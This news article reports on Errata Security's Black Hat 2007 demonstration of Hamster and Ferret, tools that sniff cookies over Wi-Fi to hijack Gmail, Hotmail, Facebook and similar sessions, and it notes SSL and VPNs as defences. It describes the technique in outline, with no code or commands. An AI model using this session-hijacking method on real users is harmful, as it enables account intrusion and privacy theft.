Researchers at Errata Security have developed tools that
sniff out users of Web-based email and social-networking sites over
Wi-Fi and hijacks their sessions.
 | | | | | Web 2.0 is fundamentally
broken.
Robert Graham,
CEOErrata Security |
| | | | | |
| |
|
Users of Google's Gmail, Microsoft's Hotmail and Yahoomail are
at risk as are users of Facebook and other Web 2.0
social-networking Web sites, said Robert Graham, a security
researcher and CEO of Errata Security.
Software-as-a-service (SaaS) offerings such as Salesforce.com
are also at risk, Graham said.
"
Web 2.0 is fundamentally broken," Graham said. "Using the tools
it's easy to hijack other people's credentials. It's a fundamental
flaw in Web 2.0."
Two tools, created by Graham and David Maynor, chief technology
officer of Errata, are called Hamster and Ferret. They work in
tandem over Wi-Fi to sniff out URLs and cookies and then store and
translate the information to allow the attacker to open a Web-based
email session without detection.
The sniffer detects the cookie data being transferred between a
wireless router and a computer. Cookies are used for authenticating
a user and can last for several years, allowing an attacker to
sniff out the information and store it for future use, Graham
said.
Graham demonstrated the tools during a session at Black Hat
2007, sniffing out URLs of users in attendance until he found a
Gmail user and quickly opened up the person's session. Although the
tools are still in their early stages of development – they lack an
easy-to-use installer and are buggy– Graham said he plans to place
them on his Web site to download for free.
The Black Hat session was called "Simple Solutions to Complex
Problems, from the Lazy Hacker's Handbook." The technique is a lazy
way to hack, Graham said, since a hacker could sit at a hotspot and
easily hijack sessions.
While a hacker can browse through a person's email and change
some settings, the hacker cannot change a password, because many
Web 2.0 applications require a second log-in, Graham said. Google
also allows users to use SSL to access their accounts, a feature
that will bar an attacker from gaining access, he said.
James Booseman, a San Jose, Calif.-based security architect, who
attended the session, said he was surprised by the demonstration.
But Booseman said that by using the appropriate security steps when
on public Wi-Fi, such as using a virtual private network, can avoid
data leakage.
"It's about keeping yourself from being at risk," Booseman said.
"I bet there are many people out there who are wide open to this
kind of attack."